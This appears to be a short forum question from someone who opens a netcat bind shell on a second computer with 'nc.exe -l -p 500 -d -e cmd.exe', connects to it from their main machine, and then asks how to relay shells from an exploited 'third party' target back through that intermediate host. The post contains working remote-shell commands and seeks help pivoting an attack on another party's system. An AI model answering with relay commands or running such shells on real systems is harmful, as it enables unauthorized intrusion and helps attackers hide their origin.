1. I open a shell on the second pc with this command [nc.exe -l -p 500 -d -e cmd.exe]
2. then I receive this shell on my main computer [nc.exe 192.168.1.152 500]
3. now I can execute commands remotely... so far no problem.
Now I would like to redirect the shells I receive on the second computer to the first one after Ive sent my exploit to a third party.
Situation:
(1) me ---> (2) second computer: sends exploit to --> (3) target: third party.
shell needs to go from (3) to (1) over a different port of my choice.
Can I do this with netcat by opening several sessions in the same time? If so, which commands do I need to use?
Other alternative methods that can help me are welcome also offcourse
